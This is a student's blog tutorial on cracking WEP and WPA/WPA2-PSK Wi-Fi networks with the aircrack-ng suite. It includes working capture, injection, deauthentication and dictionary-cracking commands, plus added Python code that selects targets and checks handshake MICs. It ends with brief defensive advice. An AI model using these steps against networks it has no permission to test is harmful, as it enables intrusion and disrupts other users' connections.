WEP/WPA/WPA2 Wi-Fi hacking

Srikar
Feb 5, 2021

Hello reader. I am Srikar, currently enrolled in the Master Certificate in Cyber Security program at HackerU. This is my first blog post, and I want to share some of what I have learned about common WEP/WPA/WPA2 attacks: how to crack a WEP network, and how to crack a WPA/WPA2-PSK network provided the passphrase is in the dictionary you feed to the handshake cracker (or you have enough GPU power to work through a much larger keyspace; a supercomputer works too, if you can buy one).

Let’s start the attack:

Requirements:

  1. Kali Linux
  2. A Wi-Fi adapter whose driver supports monitor mode and packet injection. If your base system is Kali, or you boot live Kali on a laptop, the built-in Wi-Fi chip may be enough (most laptops have one), but not every chipset supports monitor mode and injection, so check with `aireplay-ng -9 {monitor interface}` before you start.

Note: in this walkthrough I did not use an external adapter. I booted live Kali from a USB flash drive on the laptop, so an external adapter is not mandatory as long as the built-in chip supports monitor mode.

WEP ATTACK:

  1. Open a terminal (shortcut: Ctrl+Alt+T).
  2. To capture the packets in the air we need to switch the card from managed mode to monitor mode. Use the following commands:

>> iwconfig -> {lists the wireless interfaces and the mode each one is in}

>> airmon-ng check kill -> {stops NetworkManager and wpa_supplicant, which otherwise keep resetting the card while you capture}

>> airmon-ng start {your wireless interface} -> {switches the interface from managed mode to monitor mode; the monitor interface is usually named {interface}mon, e.g. wlan0mon, and that is the name used in the later commands}

>> To verify the interface is in monitor mode, run iwconfig again as shown above; it should now report Mode:Monitor.

3. To list the Wi-Fi networks around us, use the following command:

>> airodump-ng {monitor interface}

4. As you can see in the picture, the WEP network is listed first and is running on channel 11.

Description of the columns in the picture above:

BSSID: the MAC address of the access point.

PWR: signal level reported by the card (closer to 0 is stronger, so -40 is better than -70).

Beacons: number of announcement packets sent by the access point.

#Data: number of captured data packets (for WEP this is the count of unique IVs, which is the number that matters for cracking).

#/s: number of data packets per second, measured over the last 10 seconds.

MB: maximum speed supported by the access point.

ENC: encryption in use (OPN, WEP, WPA, WPA2).

CIPHER: cipher detected (WEP, TKIP, CCMP).

AUTH: authentication protocol in use (PSK, MGT, OPN, SKA).

ESSID: the name of the Wi-Fi network.

5. Let's start capturing packets from the target with the following command:

>> airodump-ng --bssid {mac_address_of_target} -c {channel} -w {capture_file_name} {monitor interface name}

--bssid limits the capture to the target access point, -c locks the card to the target's channel so it stops hopping (IVs or a handshake on channel 11 are missed while the card is listening on channel 6), and -w writes the capture to {capture_file_name}-01.cap.

Hit Enter. In my case it looks like the following picture: it shows details about the target, such as the number of clients connected to it and their MAC addresses.

Description:

BSSID >> the target's MAC address

STATION >> MAC address of a client connected to the target

These two values are what the next steps need.
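The column descriptions above and the BSSID/STATION pairing both come straight out of the CSV that airodump-ng writes next to the .cap file ({capture_file_name}-01.csv). The following is an added example, not code from the original post: it parses that CSV and picks the targets the two attacks on this page can actually hit, i.e. WEP networks (cracked from IVs alone) and WPA/WPA2 networks that have at least one associated client (without one there is nobody to deauthenticate). Every MAC address, ESSID and timestamp in SAMPLE_CSV is constructed for the demo.

```python
# Added example (not from the original post): parse airodump-ng's CSV output
# and select targets. SAMPLE_CSV is a constructed capture; all MACs, ESSIDs and
# timestamps in it are made up.
import csv
import io

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2021-02-05 10:00:00, 2021-02-05 10:05:00, 11, 54, WEP, WEP, , -40, 120, 3500, 0. 0. 0. 0, 7, HomeNet,
00:AA:BB:CC:DD:EE, 2021-02-05 10:00:01, 2021-02-05 10:05:00, 6, 130, WPA2, CCMP, PSK, -62, 98, 0, 0. 0. 0. 0, 9, CoffeeNet,
00:DE:AD:BE:EF:00, 2021-02-05 10:00:02, 2021-02-05 10:05:00, 1, 54, WPA2, CCMP, PSK, -75, 44, 0, 0. 0. 0. 0, 8, LonelyAP,
00:12:34:56:78:9A, 2021-02-05 10:00:03, 2021-02-05 10:05:00, 3, 54, OPN, , , -80, 30, 0, 0. 0. 0. 0, 8, FreeWifi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2021-02-05 10:01:00, 2021-02-05 10:05:00, -50, 300, 00:11:22:33:44:55, HomeNet
66:77:88:99:AA:CC, 2021-02-05 10:01:30, 2021-02-05 10:05:00, -58, 120, 00:AA:BB:CC:DD:EE, CoffeeNet,HomeNet
66:77:88:99:AA:DD, 2021-02-05 10:02:00, 2021-02-05 10:05:00, -70, 5, (not associated),
"""


def parse_airodump_csv(text):
    """Return (aps, stations). aps maps BSSID -> dict, and every AP carries the
    list of station MACs airodump-ng saw associated with it."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(row):                # blank separator lines
            continue
        if row[0] == "BSSID":           # header of the access-point section
            section = "ap"
            continue
        if row[0] == "Station MAC":     # header of the client section
            section = "sta"
            continue
        if section == "ap":
            aps[row[0]] = {
                "bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                "cipher": row[6], "auth": row[7], "power": int(row[8]),
                "data": int(row[10]),   # "# IV" column: unique IVs for WEP (#Data on screen)
                "essid": row[13], "stations": [],
            }
        elif section == "sta":
            sta = {"mac": row[0], "bssid": row[5], "probes": [p for p in row[6:] if p]}
            stations.append(sta)
            if sta["bssid"] in aps:     # "(not associated)" never matches an AP
                aps[sta["bssid"]]["stations"].append(sta["mac"])
    return aps, stations


def pick_targets(aps):
    """WEP is attackable on its own (it falls to IV statistics). A WPA/WPA2
    network is only useful for the handshake attack if a client is associated,
    because otherwise there is nobody to deauthenticate. Strongest signal first."""
    targets = []
    for ap in sorted(aps.values(), key=lambda a: a["power"], reverse=True):
        if ap["privacy"] == "WEP":
            targets.append((ap["essid"], ap["bssid"], ap["channel"], "wep"))
        elif ap["privacy"].startswith("WPA") and ap["stations"]:
            targets.append((ap["essid"], ap["bssid"], ap["channel"], "wpa-handshake"))
    return targets


def airodump_cmd(target, capture_name, iface):
    """The channel-locked capture command from step 5 for a chosen target."""
    essid, bssid, channel, _ = target
    return f"airodump-ng --bssid {bssid} -c {channel} -w {capture_name} {iface}"


if __name__ == "__main__":
    aps, _ = parse_airodump_csv(SAMPLE_CSV)
    for t in pick_targets(aps):
        print(t[3], t[0], "->", airodump_cmd(t, "capture", "wlan0mon"))
```

Run it against your own {capture_file_name}-01.csv by reading the file into `parse_airodump_csv`. The file is plain comma-separated text with no quoting, so an ESSID that itself contains a comma would shift the columns; airodump-ng has the same limitation in its CSV writer.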

6. As we saw above, the target has a client connected to it. The command used here is aireplay-ng with the -6 option, which is the Caffe-Latte attack: it sends the client modified ARP requests, and every encrypted reply the client sends back carries a fresh IV, so the capture fills up far faster than by waiting for normal traffic. Note that -6 is not a deauthentication (deauth is option -0, also written --deauth, used in the WPA section below), and for WEP we are not after an authentication packet at all: WEP is broken statistically, so aircrack-ng needs tens of thousands of unique IVs (watch the #Data column in airodump-ng climb) before the key falls out.

Command:

>> aireplay-ng -6 -b {target router MAC address} -h {connected client MAC address of the target} {monitor interface name}

7. Change to the directory where the capture file was written and run the following command:

>> aircrack-ng {capture_file_name}-01.cap

As the picture below shows, we successfully cracked the WEP key. If aircrack-ng instead reports that it failed and will retry with more IVs, leave airodump-ng and aireplay-ng running and run it again once #Data has grown.

LET'S start the WPA/WPA2 attack:

The main difference from WEP: WPA/WPA2-PSK has no statistical weakness to exploit, so we need to capture the 4-way handshake between a client and the access point and then guess the passphrase offline against it.

Search for the target first:

As you can see in the picture above, the target is running WPA.

Let's capture packets from the target using the following command:

>> airodump-ng --bssid {mac_address_of_target} -c {channel} -w {capture_file_name} {monitor interface name}

A client is connected to the target, so let's send it deauthentication packets with the following command:

>> aireplay-ng --deauth {number_of_packets} -a {target MAC address} -c {connected client MAC address of the target} {monitor interface name}

--deauth is the same as -0. A small number of packets such as 5 is usually enough, and 0 keeps sending until you stop it, which also knocks every other user off the network.

It looks like this:

After a successful deauthentication the client reconnects to the router and the two redo the 4-way handshake. Because airodump-ng is already capturing, the handshake lands in our capture file; airodump-ng confirms this by printing WPA handshake: {target MAC address} in the top right corner of its window.

Now that we have the handshake, start cracking the passphrase with the following command:

>> aircrack-ng -w {password dictionary file} {capture_file_name}-01.cap

As we can see, the password was cracked, which only happens because it was in the dictionary.

Note: how fast the password falls depends on your system's performance, and the dictionary has to contain it in the first place; no amount of compute helps otherwise. aircrack-ng itself runs on the CPU; to use GPU power you convert the handshake and run it through a GPU cracker such as hashcat. A day-to-day system can crack a weak passphrase, but a long, complex passphrase takes months or years.
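What "cracking the handshake" actually means is worth seeing in code. The following is an added example, not code from the original post, and it is not aircrack-ng's source: it performs the same per-candidate check that aircrack-ng -w does, so the cost per dictionary entry (4096 PBKDF2 iterations plus a PTK derivation) and why a passphrase not in the list can never be found are both visible. The SSID "HomeNet", both MAC addresses, both nonces and the passphrase "correcthorse" are constructed for the demo, and the EAPOL message 2 is a minimal frame without an RSN IE; a real capture carries the full frame, and the MIC is computed over the whole frame either way.

```python
# Added example (not from the original post, not aircrack-ng's code): the
# offline WPA/WPA2-PSK check that a dictionary attack runs per candidate.
# SSID, MACs, nonces and the passphrase below are constructed for the demo.
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # Those 4096 iterations are the whole per-candidate cost of the attack.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion",
    #               min(MACs) || max(MACs) || min(nonces) || max(nonces))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes, version: int) -> bytes:
    # MIC over the whole EAPOL-Key frame (802.1X header included) with the MIC
    # field zeroed. Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2
    # (WPA2/CCMP) uses HMAC-SHA1; both are truncated to 16 bytes.
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_zeroed_mic, digestmod).digest()[:16]


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def build_msg2(snonce: bytes) -> bytes:
    # Minimal EAPOL-Key message 2 (client -> AP), MIC field zeroed, no key data.
    body = (b"\x02"            # descriptor type: RSN
            + b"\x01\x0a"      # key info: descriptor version 2, pairwise, MIC bit
            + b"\x00\x10"      # key length
            + b"\x00" * 8      # replay counter
            + snonce           # SNonce
            + b"\x00" * 16     # key IV
            + b"\x00" * 8      # RSC
            + b"\x00" * 8      # key ID
            + b"\x00" * 16     # MIC (zero while it is being computed)
            + b"\x00\x00")     # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA-PSK passphrase length rule
            continue
        kck = derive_ptk(wpa_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, version), mic):
            return candidate
    return None


# Constructed demo network (every value here is made up).
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def make_sample_handshake(passphrase: str):
    # Plays the client's role to produce a message 2 with a valid MIC, i.e. the
    # thing airodump-ng would have written into the .cap file.
    frame = build_msg2(SNONCE)
    kck = derive_ptk(wpa_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, frame, 2)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], mic


if __name__ == "__main__":
    eapol, mic = make_sample_handshake("correcthorse")
    print(crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, eapol, mic,
                          ["password123", "letmein1", "correcthorse"]))
```

Everything the attacker needs (SSID, both MACs, both nonces, the message 2 frame and its MIC) is read from the capture; the only unknown is the passphrase, which is why the attack is offline and why the defence is a passphrase that no wordlist contains.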

Reference link, password cracking using a GPU:

https://www.youtube.com/watch?v=K-96JmC2AkE

To avoid these Wi-Fi attacks:

Update to the latest Wi-Fi protocols (WPA2 with AES/CCMP at minimum, WPA3 where your devices support it, and never WEP). Use a passphrase of at least 12 characters that mixes numbers, letters and symbols; that makes it far harder to break on a normal system. It does not mean it can never be cracked, only that it takes much longer. Change the password every 30 days.
